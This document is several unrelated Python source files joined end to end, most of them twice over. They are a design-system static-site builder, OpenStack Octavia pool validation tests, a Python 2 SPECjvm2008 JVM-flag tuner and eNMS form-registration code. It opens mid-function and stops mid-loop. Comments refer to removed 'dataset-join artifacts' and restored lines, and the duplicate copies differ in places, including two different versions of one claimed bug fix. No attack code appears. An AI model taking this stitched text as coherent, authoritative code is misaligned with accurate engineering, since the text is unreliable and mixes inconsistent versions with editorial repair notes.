            documentation_path = f"{src_dir}/{component}/README.md"
            if not os.path.isfile(documentation_path):
                print(f"No documentation for component: {component}")
                continue
            documentation = Frontmatter.read_file(documentation_path)
            # render the documentation page for the component
            render(
                f"{cset['dest']}/{component}/index.html",
                component_template,
                rendered_markdown=compile_markdown(documentation["body"]),
                section=cset["dest"],
            )
            extras = {
                "display_map": is_displaying_map(documentation),
            }
            # BUG FIX: this previously tested `reqs_org_data is not None`,
            # comparing the *function object* to None (always true), which
            # attached organisation data to every component. Call it with
            # the component's frontmatter instead.
            if reqs_org_data(documentation) is not None:
                extras["organisation_data"] = orgs
            # render all examples for component
            render_example_pages(
                component, src_dir, cset["dest"], jinja_input_path, **extras
            )
def generate_template_documentation_pages(directory):
    """Recursively render documentation and example pages for page templates.

    Walks ``directory``: .md files become documentation pages, any other
    file is rendered as a standalone example, and sub-directories are
    recursed into. Output paths mirror the source tree under "template/".
    """
    for p in os.listdir(directory):
        # map the source directory onto the published "template" tree
        output_root = directory.replace("src/digital-land/templates", "template")
        if os.path.isdir(os.path.join(directory, p)):
            generate_template_documentation_pages(os.path.join(directory, p))
        elif p.endswith(".md"):
            documentation = Frontmatter.read_file(f"{directory}/{p}")
            # index.md renders in place; other pages each get their own folder
            dest = (
                os.path.join(output_root, "index.html")
                if p == "index.md"
                else os.path.join(output_root, p.replace(".md", ""), "index.html")
            )
            # render the documentation page for the template
            render(
                dest,
                component_template,
                rendered_markdown=compile_markdown(documentation["body"]),
                section="template",
            )
        else:
            # non-markdown files are treated as example partials to include
            include_path = os.path.join(directory, p).replace("src", "examples")
            render(
                os.path.join(output_root, p),
                example_template,
                partial_name=include_path,
            )
def generate_design_system():
    """Build the full design-system site: components, templates, index pages."""
    # generate all component docs and examples
    component_sets = [
        {"type": "digital-land", "dest": "components"},
        {"type": "govuk", "dest": "govuk-components"},
    ]
    generate_component_documentation_pages(component_sets)
    generate_template_documentation_pages("src/digital-land/templates")
    # generate the index pages
    render("index.html", index_template)
    # NOTE: a plain render of get-started/index.html used to happen here,
    # only to be overwritten by the markdown render below; the redundant
    # first render has been removed.
    render_markdown_file(
        "src/guides/get-started.md", "get-started/index.html", get_started_template
    )
    render_markdown_file(
        "src/govuk/components/README.md",
        "govuk-components/index.html",
        component_template,
        section="govuk-components",
    )
    render_markdown_file(
        "src/digital-land/components/README.md",
        "components/index.html",
        component_template,
        section="components",
    )
if __name__ == "__main__":
    # --local switches asset/url roots so the site can be previewed locally
    # (dataset-join artifact removed from the final line)
    if len(sys.argv) > 1 and sys.argv[1] == "--local":
        env.globals["staticPath"] = "/static"
        env.globals["urlPath"] = ""
    generate_design_system()
import os
import sys
import glob
import jinja2
import codecs
import markdown
from bin.jinja_setup import setup_jinja
from bin.markdown_jinja import MarkdownJinja
from frontend.digital_land_frontend.filters import organisation_mapper
from frontmatter import Frontmatter
docs = "docs/"  # root output directory for all rendered pages


def render(path, template, **kwargs):
    """Render `template` with `kwargs` and write the result to docs/<path>.

    Intermediate directories are created on demand.
    """
    path = os.path.join(docs, path)
    # exist_ok avoids the check-then-create race of the original
    # os.path.exists()/os.makedirs() pair
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(template.render(**kwargs))
# configured jinja environment shared by every render call below
env = setup_jinja()
# get page templates
index_template = env.get_template("index.html")
get_started_template = env.get_template("getting-started.html")
example_template = env.get_template("iframe-base.html")
component_template = env.get_template("component-page.html")
# data for organisation autocomplete
orgs = [
    {"value": k, "text": v} for k, v in organisation_mapper.organisations.all().items()
]
# init markdown
# give it access to the configured jinja.environment
# and any macros that might be used in the markdown files
md = markdown.Markdown(
    extensions=[
        MarkdownJinja(
            env=env,
            macros={
                "designSystemExample": "design-system/components/example/macro.html"
            },
        ),
        "fenced_code",
        "tables",
    ]
)
def compile_markdown(s):
    """Convert markdown to HTML and tag the output with GOV.UK CSS classes."""
    # plain tag -> GOV.UK-classed tag, applied in order
    substitutions = (
        ("<p>", '<p class="govuk-body">'),
        ("<h1>", '<h1 class="govuk-heading-xl">'),
        ("<h2>", '<h2 class="govuk-heading-l">'),
        ("<h3>", '<h3 class="govuk-heading-m">'),
        ("<h4>", '<h4 class="govuk-heading-s">'),
        ("<ul>", '<ul class="govuk-list govuk-list--bullet">'),
        ("<pre>", '<pre class="hljs-container">'),
        ("<table", '<table class="govuk-table" '),
        ("<thead>", '<thead class="govuk-table__head">'),
        ("<tbody>", '<tbody class="govuk-table__body">'),
        ("<tr>", '<tr class="govuk-table__row">'),
        ("<th>", '<th scope="row" class="govuk-table__header">'),
        ("<td>", '<td class="govuk-table__cell">'),
    )
    html = md.convert(s)
    for plain_tag, classed_tag in substitutions:
        html = html.replace(plain_tag, classed_tag)
    return html
def read_markdown_file(p):
    """Return the text content of the markdown file at path p.

    The original used codecs.open and never closed the handle; a context
    manager guarantees release, and utf-8 is pinned so the result does not
    depend on the platform's default encoding.
    """
    with open(p, mode="r", encoding="utf-8") as source:
        return source.read()
def render_markdown_file(file_, dest_file, template, **kwargs):
    """Read a markdown file, compile it to HTML and render it into dest_file."""
    compiled_html = compile_markdown(read_markdown_file(file_))
    render(dest_file, template, rendered_markdown=compiled_html, **kwargs)
def get_components(components_dir):
    """Return the names of the component sub-directories under components_dir.

    The root directory itself (the first entry yielded by os.walk) is
    skipped; every nested directory name is returned.
    """
    walker = os.walk(components_dir)
    # skip the walk root instead of filtering it out by the hard-coded
    # name "components" afterwards, as the original did
    next(walker, None)
    # os.path.basename is portable, unlike splitting on "/" by hand
    return [os.path.basename(path) for path, _, _ in walker]
def render_example_pages(name, src_dir, dest, jinja_path, **kwargs):
    """Render a standalone example page for every HTML file of a component.

    Macro definition files are skipped: they are meant to be imported by
    other templates, not rendered as example pages in their own right.
    """
    for file in glob.glob(f"{src_dir}/{name}/*.html"):
        # guard clause + idiomatic `not in` (original used `not "x" in y`)
        if "macro.html" in file:
            continue
        example = os.path.basename(file)
        render(
            f"{dest}/{name}/{example}",
            example_template,
            partial_name=f"{jinja_path}/{name}/{example}",
            **kwargs,
        )
def is_displaying_map(documentation):
    """Return the 'contains_map' frontmatter attribute, or None if absent."""
    attributes = documentation["attributes"]
    return attributes.get("contains_map") if attributes is not None else None
def reqs_org_data(documentation):
    """Return the 'requires_orgs' frontmatter attribute, or None if absent."""
    attributes = documentation["attributes"]
    return attributes.get("requires_orgs") if attributes is not None else None
def generate_component_documentation_pages(component_sets):
    """Render the documentation page and all example pages for every component.

    component_sets is a list of dicts with a source 'type' and an output
    'dest' directory. Components without a README.md are reported and skipped.
    """
    for cset in component_sets:
        src_dir = f"src/{cset['type']}/components"
        for component in get_components(src_dir):
            jinja_input_path = f"examples/{cset['type']}/components"
            documentation_path = f"{src_dir}/{component}/README.md"
            if not os.path.isfile(documentation_path):
                print(f"No documentation for component: {component}")
                continue
            documentation = Frontmatter.read_file(documentation_path)
            # render the documentation page for the component
            render(
                f"{cset['dest']}/{component}/index.html",
                component_template,
                rendered_markdown=compile_markdown(documentation["body"]),
                section=cset["dest"],
            )
            extras = {
                "display_map": is_displaying_map(documentation),
            }
            # BUG FIX: the original wrote `if reqs_org_data is not None`,
            # comparing the *function object* to None (always true), so
            # organisation data was attached to every component. Call the
            # function so it is only attached when the frontmatter asks.
            if reqs_org_data(documentation):
                extras["organisation_data"] = orgs
            # render all examples for component
            render_example_pages(
                component, src_dir, cset["dest"], jinja_input_path, **extras
            )
def generate_template_documentation_pages(directory):
    """Recursively render documentation and example pages for page templates.

    Walks ``directory``: .md files become documentation pages, any other
    file is rendered as a standalone example, and sub-directories are
    recursed into. Output paths mirror the source tree under "template/".
    """
    for p in os.listdir(directory):
        # map the source directory onto the published "template" tree
        output_root = directory.replace("src/digital-land/templates", "template")
        if os.path.isdir(os.path.join(directory, p)):
            generate_template_documentation_pages(os.path.join(directory, p))
        elif p.endswith(".md"):
            documentation = Frontmatter.read_file(f"{directory}/{p}")
            # index.md renders in place; other pages each get their own folder
            dest = (
                os.path.join(output_root, "index.html")
                if p == "index.md"
                else os.path.join(output_root, p.replace(".md", ""), "index.html")
            )
            # render the documentation page for the template
            render(
                dest,
                component_template,
                rendered_markdown=compile_markdown(documentation["body"]),
                section="template",
            )
        else:
            # non-markdown files are treated as example partials to include
            include_path = os.path.join(directory, p).replace("src", "examples")
            render(
                os.path.join(output_root, p),
                example_template,
                partial_name=include_path,
            )
def generate_design_system():
    """Build the full design-system site: components, templates, index pages."""
    # generate all component docs and examples
    component_sets = [
        {"type": "digital-land", "dest": "components"},
        {"type": "govuk", "dest": "govuk-components"},
    ]
    generate_component_documentation_pages(component_sets)
    generate_template_documentation_pages("src/digital-land/templates")
    # generate the index pages
    render("index.html", index_template)
    # NOTE: a plain render of get-started/index.html used to happen here,
    # only to be overwritten by the markdown render below; the redundant
    # first render has been removed.
    render_markdown_file(
        "src/guides/get-started.md", "get-started/index.html", get_started_template
    )
    render_markdown_file(
        "src/govuk/components/README.md",
        "govuk-components/index.html",
        component_template,
        section="govuk-components",
    )
    render_markdown_file(
        "src/digital-land/components/README.md",
        "components/index.html",
        component_template,
        section="components",
    )
if __name__ == "__main__":
    # --local switches asset/url roots so the site can be previewed locally
    # (dataset-join artifact removed from the final line)
    if len(sys.argv) > 1 and sys.argv[1] == "--local":
        env.globals["staticPath"] = "/static"
        env.globals["urlPath"] = ""
    generate_design_system()
from oslo_utils import uuidutils
from wsme import exc
from wsme.rest import json as wsme_json
from wsme import types as wsme_types
from octavia.api.v2.types import pool as pool_type
from octavia.common import constants
from octavia.tests.unit.api.common import base
class TestSessionPersistence(object):
    """Shared checks for session persistence types; subclasses set _type."""

    _type = None

    def test_session_persistence(self):
        sp = wsme_json.fromjson(
            self._type, {"type": constants.SESSION_PERSISTENCE_HTTP_COOKIE}
        )
        self.assertIsNotNone(sp.type)

    def test_invalid_type(self):
        # an unknown persistence type must be rejected
        self.assertRaises(
            exc.InvalidInput,
            wsme_json.fromjson,
            self._type,
            {"type": "source_ip"},
        )

    def test_invalid_cookie_name(self):
        # cookie_name must be a string, not an int
        body = {
            "type": constants.SESSION_PERSISTENCE_HTTP_COOKIE,
            "cookie_name": 10,
        }
        self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type, body)
class TestPoolPOST(base.BaseTypesTest):
    """Validation tests for the PoolPOST wsme type.

    The repeated body/assertRaises boilerplate of the original is factored
    into two private helpers; the public test method names are unchanged.
    """

    _type = pool_type.PoolPOST

    def _valid_body(self, **overrides):
        # minimal valid POST body; keyword overrides replace/add fields
        body = {
            "loadbalancer_id": uuidutils.generate_uuid(),
            "protocol": constants.PROTOCOL_HTTP,
            "lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN,
        }
        body.update(overrides)
        return body

    def _assert_invalid(self, body):
        # every invalid body must be rejected with InvalidInput
        self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type, body)

    def test_pool(self):
        body = self._valid_body(listener_id=uuidutils.generate_uuid())
        pool = wsme_json.fromjson(self._type, body)
        # admin_state_up defaults to True on creation
        self.assertTrue(pool.admin_state_up)

    def test_load_balancer_mandatory(self):
        # protocol and lb_algorithm missing
        self._assert_invalid({"loadbalancer_id": uuidutils.generate_uuid()})

    def test_protocol_mandatory(self):
        self._assert_invalid({"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN})

    def test_lb_algorithm_mandatory(self):
        self._assert_invalid({"protocol": constants.PROTOCOL_HTTP})

    def test_invalid_name(self):
        self._assert_invalid(self._valid_body(name=10))

    def test_invalid_description(self):
        self._assert_invalid(self._valid_body(description=10))

    def test_too_long_name(self):
        self._assert_invalid(self._valid_body(name="n" * 256))

    def test_too_long_description(self):
        self._assert_invalid(self._valid_body(description="d" * 256))

    def test_invalid_load_balacer_id(self):
        self._assert_invalid(self._valid_body(loadbalancer_id=10))

    def test_invalid_protocol(self):
        self._assert_invalid(self._valid_body(protocol="http"))

    def test_invalid_lb_algorithm(self):
        self._assert_invalid(self._valid_body(lb_algorithm="source_ip"))

    def test_non_uuid_project_id(self):
        # project_id is deliberately not validated as a UUID
        body = self._valid_body(project_id="non-uuid")
        pool = wsme_json.fromjson(self._type, body)
        self.assertEqual(pool.project_id, body["project_id"])
class TestPoolPUT(base.BaseTypesTest):
    """Validation tests for the PoolPUT wsme type.

    The repeated assertRaises boilerplate is factored into one helper;
    the public test method names are unchanged.
    """

    _type = pool_type.PoolPUT

    def _assert_invalid(self, body):
        # every invalid body must be rejected with InvalidInput
        self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type, body)

    def test_pool(self):
        pool = wsme_json.fromjson(self._type, {"name": "test_name"})
        # untouched fields stay Unset on PUT (no defaulting)
        self.assertEqual(wsme_types.Unset, pool.admin_state_up)

    def test_invalid_name(self):
        self._assert_invalid({"name": 10})

    def test_too_long_name(self):
        self._assert_invalid({"name": "n" * 256})

    def test_too_long_description(self):
        self._assert_invalid({"description": "d" * 256})

    def test_invalid_description(self):
        self._assert_invalid({"description": 10})

    def test_invalid_lb_algorithm(self):
        self._assert_invalid({"lb_algorithm": "source_ip"})
class TestSessionPersistencePOST(base.BaseTypesTest, TestSessionPersistence):
    """Runs the shared session persistence checks against the POST type."""

    _type = pool_type.SessionPersistencePOST

    def test_type_mandatory(self):
        # a body without "type" must be rejected on creation
        self.assertRaises(
            exc.InvalidInput,
            wsme_json.fromjson,
            self._type,
            {"cookie_name": "test_name"},
        )
class TestSessionPersistencePUT(base.BaseTypesTest, TestSessionPersistence):
    """Runs the shared session persistence checks against the PUT type."""

    # (dataset-join artifact removed from the end of this line)
    _type = pool_type.SessionPersistencePUT
from oslo_utils import uuidutils
from wsme import exc
from wsme.rest import json as wsme_json
from wsme import types as wsme_types
from octavia.api.v2.types import pool as pool_type
from octavia.common import constants
from octavia.tests.unit.api.common import base
class TestSessionPersistence(object):
    """Shared checks for session persistence types; subclasses set _type."""

    _type = None

    def test_session_persistence(self):
        sp = wsme_json.fromjson(
            self._type, {"type": constants.SESSION_PERSISTENCE_HTTP_COOKIE}
        )
        self.assertIsNotNone(sp.type)

    def test_invalid_type(self):
        # an unknown persistence type must be rejected
        self.assertRaises(
            exc.InvalidInput,
            wsme_json.fromjson,
            self._type,
            {"type": "source_ip"},
        )

    def test_invalid_cookie_name(self):
        # cookie_name must be a string, not an int
        body = {
            "type": constants.SESSION_PERSISTENCE_HTTP_COOKIE,
            "cookie_name": 10,
        }
        self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type, body)
class TestPoolPOST(base.BaseTypesTest):
    """Validation tests for the PoolPOST wsme type.

    The repeated body/assertRaises boilerplate of the original is factored
    into two private helpers; the public test method names are unchanged.
    """

    _type = pool_type.PoolPOST

    def _valid_body(self, **overrides):
        # minimal valid POST body; keyword overrides replace/add fields
        body = {
            "loadbalancer_id": uuidutils.generate_uuid(),
            "protocol": constants.PROTOCOL_HTTP,
            "lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN,
        }
        body.update(overrides)
        return body

    def _assert_invalid(self, body):
        # every invalid body must be rejected with InvalidInput
        self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type, body)

    def test_pool(self):
        body = self._valid_body(listener_id=uuidutils.generate_uuid())
        pool = wsme_json.fromjson(self._type, body)
        # admin_state_up defaults to True on creation
        self.assertTrue(pool.admin_state_up)

    def test_load_balancer_mandatory(self):
        # protocol and lb_algorithm missing
        self._assert_invalid({"loadbalancer_id": uuidutils.generate_uuid()})

    def test_protocol_mandatory(self):
        self._assert_invalid({"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN})

    def test_lb_algorithm_mandatory(self):
        self._assert_invalid({"protocol": constants.PROTOCOL_HTTP})

    def test_invalid_name(self):
        self._assert_invalid(self._valid_body(name=10))

    def test_invalid_description(self):
        self._assert_invalid(self._valid_body(description=10))

    def test_too_long_name(self):
        self._assert_invalid(self._valid_body(name="n" * 256))

    def test_too_long_description(self):
        self._assert_invalid(self._valid_body(description="d" * 256))

    def test_invalid_load_balacer_id(self):
        self._assert_invalid(self._valid_body(loadbalancer_id=10))

    def test_invalid_protocol(self):
        self._assert_invalid(self._valid_body(protocol="http"))

    def test_invalid_lb_algorithm(self):
        self._assert_invalid(self._valid_body(lb_algorithm="source_ip"))

    def test_non_uuid_project_id(self):
        # project_id is deliberately not validated as a UUID
        body = self._valid_body(project_id="non-uuid")
        pool = wsme_json.fromjson(self._type, body)
        self.assertEqual(pool.project_id, body["project_id"])
class TestPoolPUT(base.BaseTypesTest):
    """Validation tests for the PoolPUT wsme type.

    The repeated assertRaises boilerplate is factored into one helper;
    the public test method names are unchanged.
    """

    _type = pool_type.PoolPUT

    def _assert_invalid(self, body):
        # every invalid body must be rejected with InvalidInput
        self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type, body)

    def test_pool(self):
        pool = wsme_json.fromjson(self._type, {"name": "test_name"})
        # untouched fields stay Unset on PUT (no defaulting)
        self.assertEqual(wsme_types.Unset, pool.admin_state_up)

    def test_invalid_name(self):
        self._assert_invalid({"name": 10})

    def test_too_long_name(self):
        self._assert_invalid({"name": "n" * 256})

    def test_too_long_description(self):
        self._assert_invalid({"description": "d" * 256})

    def test_invalid_description(self):
        self._assert_invalid({"description": 10})

    def test_invalid_lb_algorithm(self):
        self._assert_invalid({"lb_algorithm": "source_ip"})
class TestSessionPersistencePOST(base.BaseTypesTest, TestSessionPersistence):
    """Runs the shared session persistence checks against the POST type."""

    _type = pool_type.SessionPersistencePOST

    def test_type_mandatory(self):
        # a body without "type" must be rejected on creation
        self.assertRaises(
            exc.InvalidInput,
            wsme_json.fromjson,
            self._type,
            {"cookie_name": "test_name"},
        )
class TestSessionPersistencePUT(base.BaseTypesTest, TestSessionPersistence):
    """Runs the shared session persistence checks against the PUT type."""

    # (dataset-join artifact removed from the end of this line)
    _type = pool_type.SessionPersistencePUT
import argparse
import re
import jvmtunerInterface
from jvmtunerInterface import JvmFlagsTunerInterface
# Command-line options for the SPECjvm2008 tuner; shared JVM-tuner options
# (iterations, source benchmark, ...) are inherited from the parent parser.
argparser = argparse.ArgumentParser(parents=[jvmtunerInterface.argparser])
argparser.add_argument(
    '--jvm_spec_startup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false --jvmArgs "{Opt_flags}"',
    help='command template to JVMSPEC2008 statup program tuning.. ')
argparser.add_argument(
    '--jvm_spec_nonstartup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false -wt 30s -it 30s --jvmArgs "{Opt_flags}"',
    help='command template to JVMSPEC2008 nonstatup program tuning.. ')
# selects which of the two command templates above is used per run
argparser.add_argument('--spec_type', help='Select between startup and non_startup', default='startup')
class SpecJvmTuner(JvmFlagsTunerInterface):
    """Tunes HotSpot JVM flags against SPECjvm2008 benchmarks (Python 2 code)."""

    def __init__(self, *pargs, **kwargs):
        # NOTE(review): relies on the module-global `args` parsed in __main__
        super(SpecJvmTuner, self).__init__(args, *pargs,
                                           **kwargs)

    def execute_program(self):
        # Run the benchmark args.iterations times and return the mean
        # time-per-operation metric (lower is better for the tuner).
        temp_metric=0
        for i in range(0,int(args.iterations)):
            print 'running iteration '+str(i)
            if(args.spec_type == 'startup'):
                run_result = self.call_program(args.jvm_spec_startup.format(source=args.source,Opt_flags=self.flags))
            elif(args.spec_type == 'non_startup'):
                run_result = self.call_program(args.jvm_spec_nonstartup.format(source=args.source,Opt_flags=self.flags))
            temp_metric=temp_metric+self.get_ms_per_op_jvm(run_result['stdout'])
        temp_metric=float(temp_metric/int(args.iterations))
        return temp_metric

    def get_ms_per_op_jvm(self,result):
        # Extract "Score on <benchmark>: <number>" from SPEC output and
        # convert the ops/m score to a time-per-operation figure; parsing
        # failures fall back to 1 ops/m, i.e. a very bad (large) metric.
        m=re.search('Score on '+str(args.source)+': [0-9]*.[0-9]*|Score on '+str(args.source)+': [0-9]*',result,flags=re.DOTALL)
        ops_m=1
        if m:
            ops_m=m.group(0)
            ops_m =re.sub('Score on '+str(args.source)+': ','',ops_m)
            ops_m = re.sub(' ops/m','',ops_m)
            try:
                ops_m=float(ops_m)
            except:
                ops_m=1
        # NOTE(review): 6000.0/ops_m looks like a unit shortcut (ops per
        # minute -> time per op); confirm the intended constant.
        time_per_op=6000.0/ops_m
        return time_per_op
if __name__ == '__main__':
    # (dataset-join artifact removed from the final line)
    args = argparser.parse_args()
    SpecJvmTuner.main(args)
import argparse  # restored: this line was swallowed by a join artifact above
import re

import jvmtunerInterface
from jvmtunerInterface import JvmFlagsTunerInterface

# Command-line options for the SPECjvm2008 tuner; shared JVM-tuner options
# (iterations, source benchmark, ...) are inherited from the parent parser.
argparser = argparse.ArgumentParser(parents=[jvmtunerInterface.argparser])
argparser.add_argument(
    '--jvm_spec_startup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false --jvmArgs "{Opt_flags}"',
    help='command template to JVMSPEC2008 statup program tuning.. ')
argparser.add_argument(
    '--jvm_spec_nonstartup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false -wt 30s -it 30s --jvmArgs "{Opt_flags}"',
    help='command template to JVMSPEC2008 nonstatup program tuning.. ')
argparser.add_argument('--spec_type', help='Select between startup and non_startup', default='startup')
class SpecJvmTuner(JvmFlagsTunerInterface):
    """Tunes HotSpot JVM flags against SPECjvm2008 benchmarks (Python 2 code)."""

    def __init__(self, *pargs, **kwargs):
        # NOTE(review): relies on the module-global `args` parsed in __main__
        super(SpecJvmTuner, self).__init__(args, *pargs,
                                           **kwargs)

    def execute_program(self):
        # Run the benchmark args.iterations times and return the mean
        # time-per-operation metric (lower is better for the tuner).
        temp_metric=0
        for i in range(0,int(args.iterations)):
            print 'running iteration '+str(i)
            if(args.spec_type == 'startup'):
                run_result = self.call_program(args.jvm_spec_startup.format(source=args.source,Opt_flags=self.flags))
            elif(args.spec_type == 'non_startup'):
                run_result = self.call_program(args.jvm_spec_nonstartup.format(source=args.source,Opt_flags=self.flags))
            temp_metric=temp_metric+self.get_ms_per_op_jvm(run_result['stdout'])
        temp_metric=float(temp_metric/int(args.iterations))
        return temp_metric

    def get_ms_per_op_jvm(self,result):
        # Extract "Score on <benchmark>: <number>" from SPEC output and
        # convert the ops/m score to a time-per-operation figure; parsing
        # failures fall back to 1 ops/m, i.e. a very bad (large) metric.
        m=re.search('Score on '+str(args.source)+': [0-9]*.[0-9]*|Score on '+str(args.source)+': [0-9]*',result,flags=re.DOTALL)
        ops_m=1
        if m:
            ops_m=m.group(0)
            ops_m =re.sub('Score on '+str(args.source)+': ','',ops_m)
            ops_m = re.sub(' ops/m','',ops_m)
            try:
                ops_m=float(ops_m)
            except:
                ops_m=1
        # NOTE(review): 6000.0/ops_m looks like a unit shortcut (ops per
        # minute -> time per op); confirm the intended constant.
        time_per_op=6000.0/ops_m
        return time_per_op
if __name__ == '__main__':
    # (dataset-join artifact removed from the final line)
    args = argparser.parse_args()
    SpecJvmTuner.main(args)
from collections import defaultdict
from flask import request
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms.fields.core import UnboundField
from wtforms.form import FormMeta
from eNMS import app
from eNMS.database import db
from eNMS.forms.fields import (
BooleanField,
DictField,
InstanceField,
IntegerField,
JsonField,
MultipleInstanceField,
PasswordField,
StringField,
)
from eNMS.models import property_types, relationships
# Registries populated by MetaForm as each form class is created,
# all keyed by the form's form_type string.
form_actions = {}
form_classes = {}
form_properties = defaultdict(dict)
form_templates = {}
class MetaForm(FormMeta):
    """Metaclass of all application forms.

    Registers every concrete form class (and its field metadata) in the
    module-level registries, and injects any custom properties configured
    for the form type as extra wtforms fields.
    """

    def __new__(cls, name, bases, attrs):
        # the abstract base itself is not registered
        if name == "BaseForm":
            return type.__new__(cls, name, bases, attrs)
        form_type = attrs["form_type"].kwargs["default"]
        form = type.__new__(cls, name, bases, attrs)
        if not hasattr(form, "custom_properties"):
            form.custom_properties = {}
        form.custom_properties.update(app.properties["custom"].get(form_type, {}))
        # inject configured custom properties as wtforms fields
        for property, values in form.custom_properties.items():
            if not values.get("form", True):
                continue
            if property in db.private_properties:
                field = PasswordField
            else:
                field = {
                    "boolean": BooleanField,
                    "dict": DictField,
                    "integer": IntegerField,
                    "json": JsonField,
                    "string": StringField,
                }[values.get("type", "string")]
            form_kw = {"default": values["default"]} if "default" in values else {}
            field = field(values["pretty_name"], **form_kw)
            setattr(form, property, field)
            attrs[property] = field
        # register the class, its render template and its submit action
        form_classes[form_type] = form
        form_templates[form_type] = getattr(form, "template", "base")
        form_actions[form_type] = getattr(form, "action", None)
        # collect type/model metadata for every unbound wtforms field
        properties = {}
        for field_name, field in attrs.items():
            if not isinstance(field, UnboundField):
                continue
            field_type = field.kwargs.pop("type", None)
            if not field_type:
                field_type = field.field_class.type
            properties[field_name] = {
                "type": field_type,
                "model": field.kwargs.pop("model", None),
            }
            # the first positional argument is the field's display label
            if field.args and isinstance(field.args[0], str):
                app.property_names[field_name] = field.args[0]
            # password fields are always treated as private properties
            if (
                issubclass(field.field_class, PasswordField)
                and field_name not in db.private_properties
            ):
                db.private_properties.append(field_name)
        form_properties[form_type].update(properties)
        for property, value in properties.items():
            if property not in property_types and value["type"] != "field-list":
                property_types[property] = value["type"]
        # inherit field metadata from base form classes
        for base in form.__bases__:
            if not hasattr(base, "form_type"):
                continue
            base_form_type = base.form_type.kwargs["default"]
            form.custom_properties.update(base.custom_properties)
            if base_form_type == "service":
                form.service_fields = [
                    property
                    for property in properties
                    if property not in form.custom_properties
                ]
            if getattr(base, "abstract_service", False):
                form.service_fields.extend(form_properties[base_form_type])
            form_properties[form_type].update(form_properties[base_form_type])
        return form
class BaseForm(FlaskForm, metaclass=MetaForm):
    # Root of all application forms; registration happens in MetaForm.
    pass
def form_postprocessing(form, form_data):
    """Convert a submitted form's raw multidict into a plain dict.

    Each value is coerced according to the field type registered for the
    form's form_type; the result is augmented with the current user and
    any uploaded file.
    """
    data = {**form_data.to_dict(), **{"user": current_user}}
    if request.files:
        data["file"] = request.files["file"]
    for property, field in form_properties[form_data.get("form_type")].items():
        if field["type"] in ("object-list", "multiselect", "multiselect-string"):
            value = form_data.getlist(property)
            if field["type"] == "multiselect-string":
                value = str(value)
            data[property] = value
        elif field["type"] == "object":
            data[property] = form_data.get(property)
        elif field["type"] == "field-list":
            data[property] = []
            for entry in getattr(form, property).entries:
                properties = entry.data
                # default=None so a missing csrf_token (e.g. CSRF disabled)
                # does not raise KeyError, as the bare pop() did
                properties.pop("csrf_token", None)
                data[property].append(properties)
        elif field["type"] == "bool":
            data[property] = property in form_data
        elif field["type"] in db.field_conversion and property in data:
            data[property] = db.field_conversion[field["type"]](form_data[property])
    return data
def choices(iterable):
    """Build (value, label) pairs where the label equals the value."""
    return [(item, item) for item in iterable]
def configure_relationships(*models):
    """Decorator factory: attach a relationship field to the decorated form
    class for each related model named in *models*."""

    def configure_class_relationships(cls):
        form_type = cls.form_type.kwargs["default"]
        for related_model, relation in relationships[form_type].items():
            if related_model not in models:
                continue
            # list relationships get a multi-select field, scalar ones a single
            field = MultipleInstanceField if relation["list"] else InstanceField
            field_type = "object-list" if relation["list"] else "object"
            form_properties[form_type][related_model] = {"type": field_type}
            setattr(cls, related_model, field())
        # BUG FIX: return the class so this works as a decorator; the
        # original returned None, which would rebind the decorated class
        # name to None. (Dataset-join artifact also removed below.)
        return cls

    return configure_class_relationships
from collections import defaultdict  # restored: swallowed by a join artifact above

from flask import request
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms.fields.core import UnboundField
from wtforms.form import FormMeta

from eNMS import app
from eNMS.database import db
from eNMS.forms.fields import (
    BooleanField,
    DictField,
    InstanceField,
    IntegerField,
    JsonField,
    MultipleInstanceField,
    PasswordField,
    StringField,
)
from eNMS.models import property_types, relationships

# Registries populated by MetaForm as each form class is created,
# all keyed by the form's form_type string.
form_actions = {}
form_classes = {}
form_properties = defaultdict(dict)
form_templates = {}
class MetaForm(FormMeta):
    """Metaclass of all application forms.

    Registers every concrete form class (and its field metadata) in the
    module-level registries, and injects any custom properties configured
    for the form type as extra wtforms fields.
    """

    def __new__(cls, name, bases, attrs):
        # the abstract base itself is not registered
        if name == "BaseForm":
            return type.__new__(cls, name, bases, attrs)
        form_type = attrs["form_type"].kwargs["default"]
        form = type.__new__(cls, name, bases, attrs)
        if not hasattr(form, "custom_properties"):
            form.custom_properties = {}
        form.custom_properties.update(app.properties["custom"].get(form_type, {}))
        # inject configured custom properties as wtforms fields
        for property, values in form.custom_properties.items():
            if not values.get("form", True):
                continue
            if property in db.private_properties:
                field = PasswordField
            else:
                field = {
                    "boolean": BooleanField,
                    "dict": DictField,
                    "integer": IntegerField,
                    "json": JsonField,
                    "string": StringField,
                }[values.get("type", "string")]
            form_kw = {"default": values["default"]} if "default" in values else {}
            field = field(values["pretty_name"], **form_kw)
            setattr(form, property, field)
            attrs[property] = field
        # register the class, its render template and its submit action
        form_classes[form_type] = form
        form_templates[form_type] = getattr(form, "template", "base")
        form_actions[form_type] = getattr(form, "action", None)
        # collect type/model metadata for every unbound wtforms field
        properties = {}
        for field_name, field in attrs.items():
            if not isinstance(field, UnboundField):
                continue
            field_type = field.kwargs.pop("type", None)
            if not field_type:
                field_type = field.field_class.type
            properties[field_name] = {
                "type": field_type,
                "model": field.kwargs.pop("model", None),
            }
            # the first positional argument is the field's display label
            if field.args and isinstance(field.args[0], str):
                app.property_names[field_name] = field.args[0]
            # password fields are always treated as private properties
            if (
                issubclass(field.field_class, PasswordField)
                and field_name not in db.private_properties
            ):
                db.private_properties.append(field_name)
        form_properties[form_type].update(properties)
        for property, value in properties.items():
            if property not in property_types and value["type"] != "field-list":
                property_types[property] = value["type"]
        # inherit field metadata from base form classes
        for base in form.__bases__:
            if not hasattr(base, "form_type"):
                continue
